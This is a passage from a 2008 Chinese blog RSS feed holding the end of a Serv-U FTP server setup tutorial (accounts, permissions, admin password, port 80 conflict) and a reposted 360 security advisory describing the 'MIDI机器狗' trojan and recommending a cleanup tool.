<font face="宋体 "><font face="宋体 ">点&#8220;<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%C4%BF%C2%BC">目录</span>访问&#8221;，然后点&#8220;添加&#8221;进行帐户的访问权限<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%C9%E8%D6%C3">设置</span>。</font><br />
<font face="宋体 "><span id="attach_256262" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256262', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_d9a151090b0a88e1839cXy1QJk5bXwvs.jpg')" onmouseout="attachimginfo(this, 'attach_256262', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_d9a151090b0a88e1839cXy1QJk5bXwvs.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">如果你不了解这些权限的意义的话就按以下的设置，千万不能给上执行权限。设置好后点&#8220;保存&#8221;就完成访问权限的设置。</font><br />
<font face="宋体 "><span id="attach_256263" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256263', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_f7066b311653dac47927Q0O6HoapnY1w.jpg')" onmouseout="attachimginfo(this, 'attach_256263', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_f7066b311653dac47927Q0O6HoapnY1w.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
</font></font></font></font></font></font></font></font><font color="red"></font><br />
<font color="red"></font><br />
<font color="red"></font><br />
<font color="red"><font face="宋体 "><font color="#000000">然后点&#8220;保存&#8221;完成帐户的创建。</font></font><br />
<font face="宋体 "><font color="#000000"><span id="attach_256264" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256264', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_c283b9eb549070048821J2fojB4NN85Y.jpg')" onmouseout="attachimginfo(this, 'attach_256264', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_c283b9eb549070048821J2fojB4NN85Y.jpg.thumb.jpg" border="0"  alt="" /></a> </font></font><br />
<font face="宋体 "><font color="#000000"></font></font><br />
<font face="宋体 "><font color="#000000"></font></font><br />
<font face="宋体 "><font color="#000000"><font face="宋体 ">这样我就创建好了一个名为&#8220;</font><font face="Times New Roman ">username</font><font face="宋体 ">&#8221;的</font><font face="Times New Roman ">FTP</font><font face="宋体 ">帐户，这个帐户具有可读写权限。</font></font><br />
<font color="#000000"><font face="宋体 "><span id="attach_256265" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256265', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_d624dca170685331265dWSVMmkA3VWrG.jpg')" onmouseout="attachimginfo(this, 'attach_256265', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_d624dca170685331265dWSVMmkA3VWrG.jpg.thumb.jpg" border="0"  alt="" /></a> </font></font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><br />
</font><br />
<font color="#000000"><font face="宋体 "><font face="宋体 ">出于安全考虑，我们要给</font><font face="Times New Roman ">serv-u</font><font face="宋体 ">管理平台设置上一个密码，默认是空的，点击&#8220;服务器限制和设置&#8221;。</font><br />
<font face="宋体 "><span id="attach_256266" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 7853px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256266', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_37d5af1aa74a17f445a1htBTTtdy3x9O.jpg')" onmouseout="attachimginfo(this, 'attach_256266', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_37d5af1aa74a17f445a1htBTTtdy3x9O.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">进入到&#8220;服务器限制和设置&#8221;，然后点&#8220;设置&#8221;，点击&#8220;更改<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B9%DC%C0%ED%D4%B1">管理员</span>密码&#8221;。</font><br />
<font face="宋体 "><span id="attach_256267" onmouseover="showMenu(this.id, 0, 1)" style="display: none; position: absolute"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256267', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_b0c9e28230dd97f7ad9bRLknx6c34Vzb.jpg')" onmouseout="attachimginfo(this, 'attach_256267', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_b0c9e28230dd97f7ad9bRLknx6c34Vzb.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">输入新密码，然后点确定就可以了。</font><br />
<font face="宋体 "><span id="attach_256268" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 8621px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256268', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_51014928158586262932ifwONSHqK69K.jpg')" onmouseout="attachimginfo(this, 'attach_256268', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_51014928158586262932ifwONSHqK69K.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">如果你的</font><font face="Times New Roman ">IIS</font><font face="宋体 ">站点无法正常启动提示有别的<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B3%CC%D0%F2">程序</span>占用的话那可能就是因为</font><font face="Times New Roman ">serv-u</font><font face="宋体 ">占用了</font><font face="Times New Roman ">80</font><font face="宋体 ">端口，点击&#8220;域详细信息&#8221;。</font><br />
<font face="宋体 "><span id="attach_256269" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 9006px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256269', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_77ed004d1155d7620431U2Xc2VTifPUp.jpg')" onmouseout="attachimginfo(this, 'attach_256269', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_77ed004d1155d7620431U2Xc2VTifPUp.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">进入&#8220;域详细信息&#8221;后点击&#8220;监听器&#8221;，然后选择相应监听的端口规则，点编辑。</font><br />
<font face="宋体 "><span id="attach_256270" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 9390px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256270', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_12894fb4a292b931551ceppeLbnIMI3G.jpg')" onmouseout="attachimginfo(this, 'attach_256270', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_12894fb4a292b931551ceppeLbnIMI3G.jpg.thumb.jpg" border="0"  alt="" /></a> </font><br />
<br />
<br />
<br />
<br />
<font face="宋体 "><font face="宋体 ">把&#8220;启用监听器&#8221;勾去掉，然后点保存。然后把</font><font face="Times New Roman ">serv-u</font><font face="宋体 ">重启一下就可以了。</font><br />
<font face="宋体 "><span id="attach_256271" onmouseover="showMenu(this.id, 0, 1)" style="display: none; left: 213px; position: absolute; top: 9775px"><img src="http://www.discuz.net/images/default/attachimg.gif" border="0"  alt="" /></span> <a href="http://www.discuz.net/thread-921699-1-1.html###zoom"><img onmouseover="attachimginfo(this, 'attach_256271', 1)" onclick="zoom(this, 'http://www.discuz.net/attachments/month_0805/20080507_89e03baf79639655281bAwK8KmQKR2hQ.jpg')" onmouseout="attachimginfo(this, 'attach_256271', 0, event)" src="http://www.discuz.net/attachments/month_0805/20080507_89e03baf79639655281bAwK8KmQKR2hQ.jpg.thumb.jpg" border="0"  alt="" /></a>&nbsp;<br />
<br />
&nbsp;摘自：社区动力</font><br />
<br />
<br />
</font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></div>
<img src ="http://www.cnblogs.com/David-weihw/aggbug/1230945.html?type=1" width = "1" height = "1" /><br><br><a href="http://news.cnblogs.com/n/42141/" target="_blank">[新闻]用Google Earth实时追踪人造卫星</a>]]></description></item><item><title>“MIDI机器狗”的木马正在疯狂传播</title><link>http://www.cnblogs.com/David-weihw/archive/2008/05/28/1209538.html</link><dc:creator>海纳百川</dc:creator><author>海纳百川</author><pubDate>Wed, 28 May 2008 15:01:00 GMT</pubDate><guid>http://www.cnblogs.com/David-weihw/archive/2008/05/28/1209538.html</guid><wfw:comment>http://www.cnblogs.com/David-weihw/comments/1209538.html</wfw:comment><comments>http://www.cnblogs.com/David-weihw/archive/2008/05/28/1209538.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnblogs.com/David-weihw/comments/commentRss/1209538.html</wfw:commentRss><trackback:ping>http://www.cnblogs.com/David-weihw/services/trackbacks/1209538.html</trackback:ping><description><![CDATA[&nbsp;&nbsp; <br />
&nbsp;&nbsp;&nbsp; 近日，360安全中心监测显示，一种名为&#8220;MIDI机器狗&#8221;的木马正在疯狂传播，它采用驱动级技术代码写成，破坏力远超熊猫烧香。一旦中了&#8220;MIDI机器狗&#8221;，将会第一时间破坏安全软件的运行，对电脑进行远程控制，危害极大。用户如果发现360安全卫士无法正常使用，请尽快下载360专杀大全对系统进程进行扫描..（360专杀大全下载地址：<a href="http://dl.360safe.com/360compkill.zip" target="_blank">http://dl.360safe.com/360compkill.zip</a>）<br />
<br />
　　据了解，&#8220;MIDI机器狗&#8221;木马的传播渠道极为特殊，它能够发现flash溢出漏洞，并利用该漏洞迅速植入用户电脑，凡是有flash的网页，都有可能成为其传播渠道，因此，传播范围极为广泛。目前，在360百科（baike.360.cn）里，已有数万用户报告中招，专家判断受害用户将超过10万。<br />
<br />
　　此外，截至5月26日中午12点，360安全中心已经发现大面积的网页已被恶意植入了MIDI机器狗木马，这些网页都与地震消息、捐款、为四川加油等内容相关。可见，该木马传播者紧跟当前的热点新闻，希望通过网友对热点新闻的关注达到其扩散木马的目的，用心极其险恶。360安全中心提醒网友，对于不熟悉的网页，千万不要打开，如果不得不打开一些陌生网页，请先安装360安全卫士，保护自己的电脑安全，千万不能让木马制作者的阴谋得逞。<br />
<br />
　　MIDI机器狗延续了机器狗、磁碟机等其他高危木马的恶劣行为，能够对电脑进行映像劫持，使各类安全软件无法正常启动，涉及面较广。包括360安全卫士、360保险箱、360专杀大全、卡巴斯基、NOD32、QQ医生在内的几十款知名安全软件，都在MIDI机器狗的淫威下无法运行。<br />
<br />
不仅如此，中招的用户电脑还会被远程控制，成为彻底的&#8220;肉鸡&#8221;。这些&#8220;肉鸡&#8221;能够联合起来向其他电脑进行攻击。因此，有效杜绝MIDI机器狗的传播渠道，不仅是保护用户自己电脑的安全，同时也是对其他用户电脑进行保护。局域网中一旦有一台电脑中招，就有可能导致整个网络瘫痪。<br />
<br />
　　360安全中心提醒网友，当电脑处于正常的健康状态时，也应该加强安全防护措施，及时使用360安全卫士的漏洞修复功能，对潜在的flash溢出漏洞进行修复。有任何疑问均可通过邮箱fk@360.cn进行反馈，也可登录360百科（<a href="http://baike.360.cn/help.html" target="_blank">baike.360.cn</a>）发帖求助。<br />
<br />
&nbsp; 摘自：360百科
<img src ="http://www.cnblogs.com/David-weihw/aggbug/1209538.html?type=1" width = "1" height = "1" /><br><br><a href="http://news.cnblogs.com/n/42140/" target="_blank">[新闻]传IBM将以35亿美元至40亿美元收购北电</a>]]></description></item></channel></rss>